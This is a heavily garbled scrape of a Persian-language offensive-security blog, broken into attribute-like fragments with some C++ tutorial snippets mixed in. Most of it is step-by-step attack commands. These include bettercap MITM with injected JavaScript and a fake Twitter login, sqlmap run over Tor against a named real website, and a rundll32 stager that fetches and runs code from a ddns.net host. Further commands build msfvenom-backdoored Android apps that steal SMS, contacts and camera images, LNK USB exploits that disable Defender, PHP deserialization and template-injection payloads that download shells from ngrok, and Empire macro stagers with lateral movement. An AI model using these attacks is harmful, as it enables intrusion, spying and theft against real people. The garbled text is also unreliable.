computer=”” name–=”” cryptographic=”” guid–=”” contacts=”” random=”” domain=”” names–=”” installation=”” date–=”” drops=”” executable=”” files–=”” found=”” potential=”” memory–=”” modifies=”” settings–=”” installs=”” hooks=”” patches=”” running=”” process–=”” injects=”” into=”” explorer–=”” queries=”” information–=”” sets=”” suppress=”” box–=”” unusual=”” entrophy–=”” possibly=”” checks=”” presence=”” engine–=”” monitors=”” specific=”” registry=”” changes–=”” contains=”” ability=”” elevate=”” privileges–=”” software=”” video=”” bios=”” version–=”” endpoint=”” within=”” an=”” uncommon=”” section–=”” creates=”” guarded=”” regions–=”” spawns=”” lot=”” processes–=”” tries=”” sleep=”” time–=”” sections–=”” id–=”” loop–=”” interact=”” drivers–=”” inputکافیست=”” overload=”” هندل=”” کلیات=”” برسیم=”” class=”” a,=”” public:=”” ######(int=”” x,int=”” y)=”” ######(){}=”” operator-(######=”” c)=”” c.a;=”” c.b;=”” ######(a,=”” b);=”” print()=”” “a=”” is:=”” };=”” m(10,=”” 15);=”” n(20,=”” 25);=”” o;=”” o=”m” n;=”” o.print();=”” پرانتزی=”” کلاس,اما=”” میریزهنکته=”” خودنمایی=”” عملگری=”” هست!=”” گفتیم=”” ارجاع=”” کنی=”” کلاس,نکته=”” ()print=”” پاس=”” بلایی=”” سرشون=”” سربارگذاری_عملگرها-#mitm=”” tunnelingدر=”” pptp=”” cleartext=”” ciphertext=”” میتوانیم=”” inject=”” xss=”” hook=”” باشیم.این=”” بیاید=”” تونلی=”” اندازی=”” cipher=”” tsl=”” هاتی=”” اتفاق=”” افتاد,اما=”” هرچیز=”” pptpd;gem=”” 2.cd=”” ;.=”” tab3.touch=”” dns.conf;echo=”” “local=”” .*twitter\.com”=”” 4.bettercap=”” 192.168.0.234-238=”” –proxy=”” –proxy-module=”” injectjs=”” 127.0.0.1:3000=”” hook.js”=”” –proxy-pem=”” .bettercap=”” bettercap-ca.pem=”” –no-sslstrip=”” tab5.wget=”” twitter.com=”” login”=”” 6.sed=”” ‘s#\#localip=”” 192.168.0.1#localip=”” 192.168.0.1#g’=”” pptpd.conf;sed=”” ‘s#\#remoteip=”” 192.168.0.234-238,192.168.0.245#remoteip=”” 192.168.0.234-238,192.168.0.245#g’=”” #ms-dns=”” 10.0.0.1=”” ms-dns=”” 8.8.8.8=”” ppp=”” pptpd-options;sed=”” 10.0.0.2=”” 8.8.4.4=”” pptpd-options;echo=”” “######=”” *”=”” 
chap-secrets=”” start;iptables=”” postrouting=”” masquerade;iptables=”” forward=”” ppp0=”” accept;iptables=”” –state=”” established,related=”” accept;echo=”” “1”=”” ipv4=”” ip_forward;route=”” -n;netstat=”” -putan=”” 1723=”” back=”” tab8.run=”” pptp_tunnel=”” vpnhost=”(WAN)9.run” inject_host=”” inject_ca=”” cafile=”/root/.bettercap/bettercap-ca.pem” خواستم=”” نمیخوام=”” چندتا=”” سریع=”” اومدیم=”” هاستی=”” کنمش=”” میسازم=”” twitter=”” ببینه=”” ساختم=”” میبینه=”” آیپی=”” حضور=”” خواستی=”” sniff=”” هشت=”” مجموع=”” rule=”” accept=”” یازده=”” tls=”” .#bypass=”” ips=”” ids=”” sqliدر=”” معروف=”” زنده,که=”” هستش.در=”” بدم,زمانی=”” پنتستر=”” واسته=”” اسکنرها=”” interupter=”” database=”” میفرستیم=”” فیلترینگ=”” آزمون=”” java=”” serialize=”” نفوذی=”” defensive=”” مرورگرها=”” اعمال=”” فرستید=”” بشوند,مکانیزم=”” طبیعی=”” دارند,زمانی=”” معمولی=”” نداده=”” بدهید=”” ban,اما=”” تفاوتی=”” دوی=”” شاخصه=”” فضا=”” میدن,تشخیص=”” بلاک=”” شدنopen=”” terminal1.echo=”” 9050″=”” proxychains.conf;apt-get=”” tor;service=”” 2.sqlmap=”” sanjesh.org=”” fullstory.aspx?gid=”5&id=5836′” –level=”5″ –risk=”3″ –dbms=”mssql” –dbs=”” –mobile=”” –threads=”10″ –identify-waf=”” –batch=”” –tor-type=”SOCKS4″ –tor-port=”” –tamper=”randomcase,percentage” عادی=”” مبینید=”” اجازه=”” میخوره3.git=”” stamparm=”” fetch-some-proxies.git;cd=”” fetch-some-proxies;chmod=”” *;sed=”” #random_chain=”” random_chain=”” proxychains.conf;sed=”” strict_chain=”” #strict_chain=”” proxychains.conf;proxychains=”” fetch.py=”” –type=”SOCKS4″ –output=”socks4.txt;sed” ‘s#:=”” #g’=”” socks4.txt;sed=”” ‘s#:#=”” socks4.txt;cat=”” socks4.txt=”” 4.service=”” restart;cd=”” ;reset;proxychains=”” –timeout=”10″ chain=”” زنده=”” خورده=”” سلامت=”” برگشته,=”” randomcase=”” percentage=”” شمایل=”” obf=”” طرفی=”” زنجیره=”” نتونه=”” threading=”” رهگیری=”” براتون.https:=”” intrusion-detection-evasion-attackers-burglar-alarm-1284#bypassavs=”” objects=”” obfدر=”” stager=”” دستمون=”” سازیش=”” سبکی=”” کرد.-2kedited [2:03:56=”” pm]-> -> photoهمونطور=”” دل=”” 
runer=”” rundll32.exe=”” مفسر=”” کنیدrundll32.exe=”” javascript:”\..\mshtml,=”” runhtmlapplication=”” “;x=”new%20ActiveXObject(“Msxml2.ServerXMLHTTP.6.0”);x.open(“GET”,”http://######.ddns.net:4141/eeA6b”,false);x.send();eval(x.responseText);window.close();” wbemscripting.swbemlocator=”” win32_process=”” پراسسی=”” وسط=”” اول:=”” چیو=”” میشناسیم=”” افته؟=”” get=”” سواره=”” دوم:=”” activexobject=”” ۷=”” shell=”” پراسس=”” گیج=”” ابداع=”” نو=”” ظهور=”” بودنش=”” امان=”” بسنده=”” محصول=”” روس=”” استاد=”” عروس=”” شوهر=”” شدند=”” هستند,نکته=”” سوم:=”” حدی=”” فیما=”” r<!=”#+/*]-([_&%?$>)u<!=#+/*]-([_&%?$>)n<!=#+/*]-([_&%?$>)d<!=#+/*]-([_&%?$>)l<!=#+/*]-([_&%?$>)l<!=#+/*]-([_&%?$>)” <!=”#+/*]-([_&%?$>)” نمیشد=”” بزارم=”” خاطر=”” rundll=”” replace=”” مقدارyhdrhqfhpcjz.create(replace(“payload;”,=”” “<!=”#+/*]-([_&%?$>)”,” “”)=”” result=”” replace:=”” “”=”” پوچ=”” نمیده=”” vbscripthttps:=”” 164787=”” info-windows-rundll-and-rundll32-interface-#machine=”” obfuscatingدر=”” ماشین=”” سطوح=”” بخوایم=”” hard=”” disk=”” detect=”” تحلیلگر=”” میدند…مدر=”” میندازیم=”” بشم,خب=”” افته=”” چی؟؟=”” asa=”” cisco=”” خرابکار=”” سیستمی=”” داخلی=”” رصدها=”” <connect_socket=”” remote_addr=”192.168.1.163″ remote_port=”25″ successful=”1″ winsock_result=”10035″ 0a=”” 0019=”” 025d0ce6=”” 00343365=”” connect_socket=”” remote_address=”” xml-data=”” برسه=”” درصد=”” interupt=”” خطرناک=”” همینجا=”” غیرمجاز=”” drop=”” میکنه,خب=”” میخوای=”” خودتو=”” بزنی=”” کردی=”” کنی؟؟؟=”” بدی=”” میکردیم,اما=”” میشنpolymorphic,metamorphic,mimimorphic,hemimorphic,oligomorphic=”” مشهور=”” polymorphic=”” ریختگی=”” گذاشت=”” ابهام=”” کنن???un-obfuscated=”” unique=”” substring=”” *binary=”” plain=”” *segments=”” oligomorphism=”” algorithmic=”” *simple=”” transformation=”” (xor)=”” *build=”” transformations=”” polymorphism=”” statistical=”” *compression=”” *anomalies=”” body=”” metamorphism=”” pattern=”” matching=”” *meta=”” (p-code)=”” *n-gram=”” signatures=”” art=”” semantic=”” *control-flow=”” *persist=”” high-level=”” 
fingerprints=”” *byte=”” frequency=”” manipulation=”” متقابلی=”” تقابل=”” پیروز=”” ماموریتی=”” mimimorphic=”” mimic=”” بهتری=”” فردا=”” ,قبل=”” میدهwindows=”” com-dll=”” handling-filesystem-icmp-inifile-internet=”” helper-mutex-network-registry-process-category-windows=”” services-system-systeminfo-thread-user-virtual=”” memory-window-winsock-protected-storage-windows-hooks=”” سرویسی=”” کنیم,تکنیک=”” بصوت=”” درختی=”” میکه=”” چیده=”” میشند=”” بکنید=”” pushdecmov0*10=”” 1cmp=”” *0=”” 1xchg=”” movدر=”” دستورpush=”” بگیره؟=”” cmp=”” xchg=”” mov?=”” پاسخ=”” تصویری=”” prng=”” steganography=”” تصادفی=”” میدونه=”” rpng=”” هست,اینها=”” xorpushdec*0=”” inc0=”” 1mov=”” pushدر=”” 00010100=”” وبالا=”” برو=”” شرطه=”” mov=”” شرطی=”” huffman=”” tree,درختی=”” هافمن=”” فرکانس=”” نماد=”” شود,در=”” رمزنگای=”” درخت=”” هوفمن=”” رمزگشایی=”” symbols=”” accord=”” بازیابی=”” میکنیم,یک=”” میزنم*0=”” 1*=”” s0=”” asymbol:=”” symbol=”” 00=”m” 01=”a” (6bit)=”” 000111=”=>” (32bit)=”” سمبل=”” تفسیر=”” شداین=”” ها….https:=”” www.semanticscholar.org=”” normalizing-metamorphic-malware-using-term-walenstein-mathur=”” 28a002585c8563d19e8d166379a83e3df9269b0bhttps:=”” nsuworks.nova.edu=”” cgi=”” viewcontent.cgi?referer=”&httpsredir=1&article=2006&context=gscis_etd#APK” (bind=”” spearphishing)در=”” اپلکیشن=”” نسبت=”” حملاتی=”” spearphishing=”” میگیرم=”” واقعی=”” بیاد…-1.9kedited [10:19:15=”” pm]-> -> photoقبل=”” فازش=”” صیغه=”” یاب=”” امسال=”” طلاگرام=”” غیره,اکی=”” سناریو,=”” imo=”” اینکارhttps:=”” play.google.com=”” store=”” apps=”” details?id=”com.imo.android.imoim&hl=enاز” پلی=”” بدهhttps:=”” apps.evozi.com=”” apk-downloader=”” کردید=”” imo.apk=”” کنید,نکته=”” شروع,برنامه=”” noip=”” terminal1.noip2;noip2=”” -s;ifconfig;service=”” start;gnome-terminal=”” –tab=”” ‘ngrok=”” 80’=”” 2.nano=”” autoand.rc=”” addedsysinfo=”” check_root=”” getwd=”” geolocate=”” screenshot=”” dump_calllog=”” dump_sms=”” dump_contacts=”” webcam_snap=”” sdcard=”” dcim=”” camera=”” enterدر=”” ترمینال,اما=”” تلفن=”” گالری=”” 
کرد3.msfvenom=”” android=”” dalvik=”” imo-b.apk=”” تداخلات=”” قطعی=”” میدیم,درضمن=”” 4141=”” 4444=”” isp=”” صحنه=”” بلکل=”” مسدود=”” امتحان=”” فوش=”” ندید=”” گفتند=”” :)))=”” 4.gnome-terminal=”” ‘msfconsole=”” example.ddns.net;set=”” 192.168.1.4;set=”” autoand.rc;exploit=”” -j”‘=”” داد5.wget=”” cafebazaar.ir=”” com.imo.android.imoim=”” ?l=”fa”” معتبر=”” بسازه=”” link=”” قبول=”” خودمون6.sed=”” ‘s#<=”” body>#<iframe=”” id=”frame” width=”0″ height=”0″ style=”hidden” frameborder=”0″ marginheight=”0″ marginwidth=”0″ scrolling=”no>>\\n<script” >settimeout(function(){window.location.href=”https://cafebazaar.ir/app/com.imo.android.imoim/?l=fa” ;},=”” 15000);<=”” body>#g’=”” پیشنهاد=”” انگاری=”” pop=”” گذشت=”” ۱۵=”” bazaar=”” جعلی=”” 7.gnome-terminal=”” ‘firefox=”” e79129e7.ngrok.io’=”” نه…#usb=”” cpl=”” (stuxnet)در=”” داشتند=”” autorun=”” lnk=”” cve-2010-2568=”” shortcut=”” شد,یک=”” جانبی=”” shared=”” folder=”” cve-2017-8464=”” است.http:=”” www.geoffchappell.com=”” notes=”” ctrlfldr.htm به=”” خلاصه،=”” پیوند=”” cplapplet=”” هستش,اما=”” جالبه=”” اجراش=”” کرد,cpl=”” click=”” control.exe=”” file.cpl=”” مثال:obj=”CreateObject” (“shell.application”)=”” obj.controlpanelitem=”” (“######.cpl”)=”” control_rundll=”” control_rundllasuser=”” shell32.dll=”” زیره:cpl=”” index=”” شاخص=”” اپلتapplet=”” appletیک=”” اپلت=”” multitabbed=”” ندارد,هنگامی=”” میشه،=”” کنه,برای=”” مفدار=”” cplapplet:long=”” cplapplet(=”” hwnd=”” hwndcpl,=”” uint=”” umsg,=”” lparam=”” lparam1,=”” lparam2=”” );=”” pe32=”” وpe32+=”” cve-2015-0096=”” dynamic=”” specialfolderdatablock=”” خوردنش=”” میشه,استفاده=”” ویژوال=”” استودیو=”” بدیمint=”” cplapplet(hwnd=”” message,=”” lparam2)=”” محل=”” پایلود…=”” dllmain=”” نباشیم,بنابراین=”” کنیمinit=”” cpl_init=”” getcount=”” cpl_getcount=”” inquire=”” cpl_inquire=”” cpl_select=”” dblclk=”” cpl_dblclk=”” cpl_stop=”” exit=”” cpl_exit=”” newinquire=”” cpl_newinquire=”” startwparms=”” cpl_startwparms=”” otherwise,=”” cpload=”” send=”” all=”” messages=”” cplapplet()=”” 
اکسپلویتش=”” 2017=”” میدیم…#=”” cpl-attack=”” #visit=”” dashboard.ngrok.com=”” signupvisit=”” (authtoken)=”” authمن=”” خلاص=”” میشیم=”” real=”” جورای=”” ایمنی=”” forensic=”” نشدن=”” کنهinstall=”” ngrokopen=”” terminal1.shell=”#!” “$shell=”” bash”=”” ngrok;echo=”” “$@”‘=”” ngrok;mkdir=”” ngrok;chmod=”” ngrok;cd=”” ngrok;wget=”” bin.equinox.io=”” 4vmdza7iahb=”” ngrok-stable-linux-amd64.zip;unzip=”” ngrok-stable-linux-amd64.zip;rm=”” ngrok-stable-linux-amd64.zip=”” icon=”” فرمانی=”” میسازم2.apt-get=”” tor;echo=”” proxychains.conf;service=”” ;ngrok=”” authtoken=”” (authtoken);gnome-terminal=”” ‘proxychains=”” 4444’=”” (porttcp)اما=”” ازای=”” میکنیمinstall=”” netripper3.git=”” nytrorst=”” netripper.git;mkdir=”” netripper;cp=”” netripper=”” netripper.rb=”” netripper.rb;cp=”” dll.x86.dll=”” dll.x86.dll;cp=”” dll.x64.dll=”” dll.x64.dll;rm=”” sniffer=”” کنیمcteate=”” postexp4.nano=”” autowin.rc=”” gettelnet=”” sticky_keys=”” sc=”” sharedaccess=”” “reg=”” hklm\software\microsoft\windows\currentversion\policies\system=”” v=”” enablelua=”” t=”” reg_dword=”” f”=”” service_control=”” wscsvc=”” windefend=”” processnames=”firefox.exe” verbose=”true” enum_av_excluded=”” نیمه=”” ارتقا=”” telnet=”” داد5.msfconsole=”” fileformat=”” cve_2017_8464_lnk_rce;set=”” (porttcp);exploit=”” shikata_ga_nai;exit”;mkdir=”” usb;mv=”” .msf4=”” usb;reset;msfconsole=”” 4444;set=”” autowin.rc;exploit=”” cve_2017_8464_lnk_rce=”” پایلودش=”” فولدر=”” فلش=”” نبودن=”” شد…avi######=”” 355https:=”” www.symantec.com=”” security-center=”” vulnerabilities=”” writeup=”” 98818https:=”” nixawk=”” labs=”” exploit_cve-2017-8464.py#php=”” injectionدر=”” serialization=”” کنیم,البته=”” سالها=”” است…-خب=”” پلتفرم=”” پارامترها=”” هستش,زبان=”” phpیک=”” بارگیری=”” کنه,=”” ()serialize=”” ()unserialize=”” فهم=”” دقیقتر=”” میکنیم<?php=”” $object=”new” stdclass();=”” $object->data=”Some data!” $cached=”serialize($object);” شی=”” سپس=”” شیء=”” میکنه,به=”” o:8:”stdclass”:1:{s:4:”data”;s:10:”some=”” data!”;}=”” serialized=”” 
نشانه=”” stdclass=”” خواص=”” جسم=”” براکت=”” مجعد=”” arrays-integers-strings-objects-null=”” مثال،=”” length=”” میشه,امابرای=”” unserialize=”” فرایندی=”” میگیره؟=”” ببینید<?php=”” data!”;}’);=”” $object->data;=”” آسانی=”” کنه،=”” ممکن=”” usersession=”” global=”” $_session=”” ببره,اما=”” developing=”” مخاطرات=”” بیاره=”” چطور؟!=”” منتقل=”” بشه!!!=”” مثال:<?php=”” loggingclass=”” __construct($filename,=”” $content)=”” $this->filename=”$filename” “.log”;=”” $this->content=”$content;” __destruct()=”” file_put_contents($this->filename,=”” $this->content);=”” $data=”unserialize($_GET[‘data’]);” ()__destruct=”” دریافتی=”” رایتش=”” نامی=”” آورد,خب=”” اسمی=”” میشه!=”” پایلودها=”” بهتون open=”” terminal1.ngrok=”” 2.service=”” start;weevely=”” 0098=”” weevely.txt=”” کنیمo:12:”loggingclass”:2:{s:8:”filename”;s:11:”weevely.php”;s:7:”content”;s:78:”<?php=”” (‘wget=”” 75c896cc.ngrok.io=”” ######.php’);=”” ?>”;}=”” ()system=”” ######.php=”” شل=”” تزریقی=”” کاراکتری=”” 78=”” بگذارید3.proxychains=”” pressreleases=”” ######.php=”” 0098=”” شید,هم=”” پایلودهای=”” هستش…https:=”” frohoff=”” ysoserialhttp:=”” php.net=”” manual=”” function.serialize.phphttps:=”” grrrdog=”” java-deserialization-cheat-sheet#php=”” core=”” vulnerabilitiesدر=”” میده,=”” webapplication=”” بیس=”” حافظه؟:)-آسیب=”” علت=”” اشتباهات=”” میده.=”” پیگیری=”” شوند،=”” منبع=”” امنه=”” مترجم=”” هستش.=”” پست،=”” اشکالات=”” بده,آمار=”” 93=”” کنند,=”” مابقی=”” ویرایشی=”” میکنند,=”” 5.6=”” شود،=”” چند,=”” انتشار=”” پچ=”” گذشته=”” است,=”” 62=”” 5.6.30=”” ژانویه=”” شده,با=”” 79=”” interpreter=”” بود,=”” دلایل=”” بخوان=”” کدهایی=”” بهم=”” خورد=”” chenge=”” افتاده=”” کنیدhttps:=”” secure.php.net=”” de=”” migration70.changed-functions.phpخب=”” حفره=”” کرد,اما=”” کنیم,=”” بالاست=”” سفارشی=”” نداره,=”” نمیتونند=”” corruption=”” بشوند,اما=”” عوض،=”” کند,=”” تأثیر=”” بگیره,در=”” واقع،=”” 5،700=”” میشه,=”” <?php=”” feature();=”” —>=”” (zend=”” engine)=”” (c=”” feature)=”” است:unserialize()=”” 7.0.15=”” cve-2017-5340=”” 
wddx_deserialize()=”” pointer=”” dereference=”” cve-2016-10162=”” curl_escape()=”” 7.0.10=”” cve-2016-7134=”” str_pad()=”” 7.0.4=”” cve-2016-4537=”” utf8_encode()=”” cve-2016-4345=”” imagerotate()=”” 5.5.31=”” incorrect=”” cve-2016-1903=”” terminal1.searchsploit=”” 2.cat=”” dos=”” 38122.txt=”” yet=”” another=”” after=”” free=”” unserialize()=”” splobjectstorageدر=”” کرد…https:=”” reports=”” 141956https:=”” using_freed_memory#access=”” specifier=”” c++میخوایم=”” mitigation=”” بخصوصی=”” میکند=”” قواعد=”” برجسته=”” کرد…-در=”” هنگامی=”” متغیری=”” :public=”” منظوره=”” متغیرهای=”” نمای=”” public-private-protected=”” متغیرهارو=”” #privateدر=”” است#publicدر=”” عمومی=”” میگیرند#protectedدر=”” بودقبل=”” پرداختن=”” فرق=”” مقوله=”” متغیرهایی=”” میباشند,=”” مفید=”” کرد!=”” prototype=”” مذکور=”” ::=”” مثال:#include=”” dateclass=”” private:=”” day;=”” month;=”” year;=”” setdate(int,=”” int,=”” int);=”” printinfo()=”” day=”” month=”” year=”” dateclass::setdate(int=”” d,=”” m,=”” date;=”” date.setdate(2,=”” 5,=”” 2018);=”” date.printinfo();=”” آمدنش=”” چیست؟=”” موضوعی=”” encapsulation=”” میخواهد=”” بنویسد,=”” راهکارهایی=”” سردرگمی=”” بیاورد=”” objective=”” فرایندهای=”” متعدد=”” میزنم:فرض=”” فرایند=”” برگردونه=”” بخواید=”” بسان=”” بنویسید,=”” هربار=”” نمینویسیم=”” مینویسیم=”” بالاخره=”” کنم؟=”” num=”” کنم,دلیل=”” متشکل=”” بزنه!!!=”” دلایلی=”” کردم…https:=”” access_modifiers#server=”” template=”” پوسته=”” کرد,آسیب=”” ssti=”” اشتباهی=”” دستورالعمل=”” دلخواه=”” … اما=”” render=”” مداوم=”” شناسندmako-jinja2-python=”” (code=”” eval)-tornado-nunjucks-pug-dot-marko-javascript=”” eval)-dust=”” (<=”dustjs-helpers@1.5.0)-EJS-Ruby” eval)-slim-erb-smarty=”” (unsecured)-php=”” eval)-twig=”” (>1.19)-smarty=”” (secured)-dust=”” (>=”” dustjs-helpers@1.5.0)=”” میکنه,=”” موتورهای=”” bracket=”” زیر${{0090+8}}=”” اومدhello=”” $0098=”” میده؟=”” flask=”” flask,=”” jinja2=”” environment=”” @app.route(“=”” page”)=”” page():=”” output=”Jinja2.from_string(‘Hello” ‘!’).render()=”” “__main__”:=”” 
app.run(host=”0.0.0.0″ داده!؟=”” خام=”” شده,منظورم=”” میکنه…خب=”” همینجاس=”” from_string=”” terminal1.curl=”” www.target.com=”” page?name=”{{7*7}}'” 49!در=”” response=”” مضربی=”” سادگی=”” م=”” کنید2.service=”” c32bfbfd.ngrok.io=”” localhost:803.msfvenom=”” ######.elf;gnome-terminal=”” 4.curl=”” ”.__class__.__mro__[2].__subclasses__()[40](‘=”” unk9.cfg’,=”” ‘w’).write(‘from=”” subprocess=”” check_output\n\nruncmd=”check_output\n’)” }}’=”” 5.curl=”” config.from_pyfile(‘=”” unk9.cfg’)=”” }}=”” 6.curl=”” config[‘runcmd’](‘wget=”” ######.elf;chmod=”” ######.elf;=”” ######.elf’,shell=”True)” آمدیم=”” رزرو=”” 64bit=”” دایکتوری=”” آمیز=”” ما,اما=”” runcmd=”” permission=”” نظرش=”” حتما=”” نظرتون=”” دارهfreemaker5.<#assign=”” ex=”freemarker.template.utility.Execute” ?new()>=”” ${=”” ex(“id”)=”” velocity5.class.inspect(“java.lang.runtime”).type.getruntime().exec(“sleep=”” 5″).waitfor()=”” smarty5.{smarty_internal_write_file::writefile($script_name,”<?php=”” passthru($_get[‘cmd’]);=”” ?>”,self::clearconfig())}=”” sandbox=”” twig=”” حساس=”” exec=”” اتخاذ=”” دادtwig5.{{_self.env.registerundefinedfiltercallback(“exec”)}}=”” 6.{{_self.env.getfilter(“id”)}}=”” عملکرد=”” twigphp=”” d63ac2088e8d30137cde10f310ab89b06dab916b=”” securitypolicy.php#l83اما=”” tplmap=”” کنید7.git=”” epinna=”” tplmap.git;cd=”” tplmap;chmod=”” *;pip=”” 8..=”” tplmap.py=”” –os-shell=”” 9..=”” 192.168.56.101:3000=”” ti?user=”*&comment=supercomment&link”” 10..=”” jade=”” فرضی=”” pentester=”” بالاتری=”” extension=”” menu=”” burp=”” کنید…امیدوارم=”” کرد…11.mkdir=”” jython;wget=”” search.maven.org=”” remotecontent?filepath=”org/python/jython-installer/2.7.0/jython-installer-2.7.0.jar'” jython_installer.jar;java=”” -jar=”” jython_installer.jar=”” jython=”” standard;pip=”” pyyaml=”” requests=”” extender=”” …=”” (jython-installer.jar)go=”” extensions=”” type:=”” (python)=”” burp_extension=”” burp_extender.pyیه=”” احمقی=”” گزاشته=”” میگفت=”” یادش=”” بخیر…https:=”” 125980https:=”” 46386https:=”” startupبد=”” مستند=”” 
برگرفته=”” ایده=”” ارمغان=”” مطمعن=”” بریم… قبل=”” آپ=”” بپردازم=”” تحقیقاتم=”” خدمت=”” عزیزان=”” مقایسه=”” خصوص,=”” غرب=”” رواج=”” متاسفانه=”” ناچار=”” پدر=”” سوختگی=”” متمرکز=”” آپی=”” سرگرم=”” مالی=”” وابسته=”” شگفت=”” انگیزی=”” سازماندهی=”” دانشگاهی=”” بشه…خب=”” علاقمندان=”” میارند=”” آوردم=”” آنجایی=”” میگرده=”” خوشبین=”” فرزندانشان=”” علاقمندانه=”” خودسازی=”” نمیکنند=”” خانوار=”” یکیش=”” نمیدونه=”” آگاه=”” نمیکنه….اما=”” ؟!=”” استناد=”” فهمید=”” درآمدزا=”” کشورها=”” هستش,=”” جوانان=”” نکردند؟=”” اشراف=”” برهم=”” ngo=”” اند؟=”” کهنه=”” صدد=”” تشکیل=”” نبوده=”” بصیرت=”” سرآیند=”” تشکیلات=”” اونها,=”” مگه=”” فضاهایی=”” نداشتیم=”” محصولات=”” offensive=”” اید؟=”” محصولاتی=”” nessus=”” tenable=”” سرمایه=”” خدمات=”” ارز=”” شدنی=”” چشمی=”” اراده=”” فتح=”” قله=”” جامعه=”” گاز=”” ببرند=”” استارآپ=”” میلیون=”” دلاری=”” هرگز=”” نفره=”” دولتی=”” بیایند=”” کثیری=”” جذب=”” روشنی=”” بدیم,اولین=”” اپ=”” تونست=”” خودی=”” vip=”” سرپا=”” نیستم,=”” avandcloud=”” معروفی=”” ندیدمش=”” متنوع=”” cybereason=”” میگیرفت=”” تهاجمی=”” جنگ=”” حکومت=”” کنه….https:=”” cyber-map=”” threat-map.htmlhttp:=”” exploitpack.com=”” packs.htmlhttps:=”” www.trendmicro.com=”” en_us=”” business.htmlhttps:=”” www.cybereason.com=”” active-monitoringhttps:=”” www.tenable.com=”” products=”” nessus-professional#cfg=”” mitigationدر=”” 8.1=”” چیا=”” بوده…مکانیزم=”” cfg=”” flow=”” guard=”” نمایان=”” مقاومت=”” میداد,=”” nx=”” میگرفت,=”” میکرد=”” میکردیم؟=”” خنثی=”” virtualprotect()=”” میگرفت=”” مینوشت=”” push=”” استک=”” بردم=”” میشدند=”” میخورد,اما=”” آمدن=”” افتاد=”” snapshot=”” ازشون=”” شعاع=”” دفعات=”” وقفه=”” نشده=”” کنه!!!=”” بشه,=”” cfi=”” integrity=”” تصدیق=”” هستش,به=”” دلیله=”” محافظ=”” integrity,=”” مجاز=”” صحت=”” میکند,اما=”” میکنه؟=”” userland=”” ساختمان=”” هستشdd=”” __guard_check_icall_fptr=”” guardcfcheckfuntionpointerdd=”” reserved2dd=”” __guard_fids_table=”” guardcffuntiontabledd=”” 1929=”” guardcffuntioncountdd=”” 3500h=”” guardflagsاولین=”” کلیدی=”” هستشدومین=”” گر=”” هستشسومین=”” جدول=”” 
cfgچهارمین=”” پرچم=”” داد.-#dep bypassمکانیزم=”” کارشان=”” میپردایم..initialize=”” ldrsystemdllinitblock•=”” +0x60=”” :=”” bitmap=”” address•=”” +0x68=”” size•=”” initialized=”” by=”” psppreparesystemdllinitblock•=”” ntcreateuserprocess->pspallocateprocess->pspsetupuserprocessaddressspaceldrpcfgprocessloadconfig•=”” headers->optionalheader.dllcharacteristics•=”” image_dllcharacteristics_guard_cf=”” flag=”” •=”” loadconfig->guardcfcheckfunctionpointer•=”” ldrpvalidateusercalltargeاکی=”” ldrsystemdllinitblock=”” ntcreateuserprocess=”” pspallocateprocess=”” pspsetupuserprocessaddressspace=”” میباشد,=”” بلوکه=”” میره,=”” ldrpcfgprocessloadconfig=”” optionalheader.dllcharacteristics=”” مشخصات=”” image_dllcharacteristics_guard_fc=”” گره=”” guardcfcheckfuncationpointer=”” ldrpvalidateusercalltarget=”” مختصر=”” مکانیزم,=”” میخواستم=”” شد,دور=”” مطرح=”” میکنم.=”” gadgets=”” (generic=”” bypass)shifted=”” pointers=”” (32-bit=”” bypass)virtual=”” hijacking=”” control-flow_integrityhttps:=”” secbp=”” control-flow-guardhttps:=”” packetstormsecurity.com=”” files=”” 145220=”” chakra-cfg-bypass-due-to-bug-in-serverfreeallocation.htmlhttps:=”” us-15=”” materials=”” us-15-zhang-bypass-control-flow-guard-comprehensively-wp.pdf-#empire=”” exploitationدر=”” empire=”” چندسالی=”” شدنش=”” نمیگذره=”” اقدامات=”” میشه…این=”” harmj0yhttps:=”” sixdubhttps:=”” enigma0x3این=”” تونسته=”” 300=”” اهدافی=”” ایفای=”” سرچشمه=”” میگیرد=”” evasion=”” بودند=”” stageless=”” رندرهای=”” dcom=”” رسانده=”” excel=”” کنید,من=”” empireproject=”” empire.git;cd=”” setup=”” requirements.txt;bash=”” install.sh;cd=”” برنامه،=”” listener=”” میکنیم2.listeners=”” 3.uselistener=”” 4.set=”” 5.set=”” host=”” example.ddns.net=”” 6.set=”” bindip=”” 192.168.1.4=”” 7.usestager=”” 8.set=”” 9.generate=”” autoopen()=”” document_open()=”” debugging()=”” variant=”” str=”” “aw1wb3j0ihn5cztpbxbvcnqgcmusihn1ynbyb2nlc3m7y21kid0gin”=”” “bzic1lzib8igdyzxagtgl0dgxlxcbtbmln1ynbd0y2ggfcbncmvwic”=”” 
“jkkgnoyxipxlnbkfnbapbxbvvd0ru1tqxsklmju2xskpcmv4zwmojy”result=”system(“echo” “”import=”” sys,base64;exec(base64.b64decode(\””=”” \””));””=”” &”)=”” allopen=”” alt+f8=”” name:=”” (debugging)=”” create=”” allsend=”” targetخب=”” مراحلی=”” کنید,=”” 2016=”” basic=”” applicaton=”” کنیم،=”” میگذاریم=”” ctrl+a=”” ctrl+v=”” فشاریم=”” پیشرفته=”” مونده=”” شک=”” نکنه…فایل=”” agent=”” اذیت=”” meterpreter(ssl)10.list=”” (agent)11.rename=”” (agent)=”” victim=”” tab12.msfconsole=”” migrate;exploit=”” listening=”” 443=”” فعالش=”” listeners=”” کنید,back=”” tab13.listeners=”” 14.set=”” meter=”” 15.set=”” 16.set=”” 17.set=”” 18.set=”” certpath=”” empire-chain.pem=”” 19.execute=”” میدم,=”” کنید20.interact=”” 21.injectshellcode=”” 22.set=”” 23.set=”” 24.execute=”” see=”” tabدر=”” شدیم=”” injectshellcode=”” است,bypassuacback=”” tab25.bypassuac=”” *enter*or(token)26.back=”” 27.usemodule=”” credentials=”” tokens=”” 28.run=”” pid=”” hijack=”” هویت=”” بشه…copy=”” (administrator=”” processid)29.usemodule=”” management=”” psinject=”” 30.set=”” procid=”” processid)31.set=”” 32.run=”” بشهpivoting33.isteners=”” 34.set=”” ######2=”” 35.set=”” 36.set=”” 37.set=”” 38.execute=”” 39.interact=”” 40.usemodule=”” situational_awareness=”” powerview=”” find_l=”” 41.set=”” 42.execute=”” میگردیم=”” میکشیم=”” میکنیمcopy=”” (computernames)43.back44.usemodule=”” lateral_movement=”” invoke_psexec=”” 45.set=”” 46.set=”” computername=”” (computername)47.execute=”” *enter*ما=”” میپردازیمprivilege48.agents=”” (newagent)49.rename=”” (newagent)=”” victim2=”” 50.interact=”” 51.usemodule=”” code_execution=”” invoke_shellcode=”” 52.set=”” 53.set=”” 54.execute=”” 48=”” تازه=”” 49=”” 50=”” ,در=”” 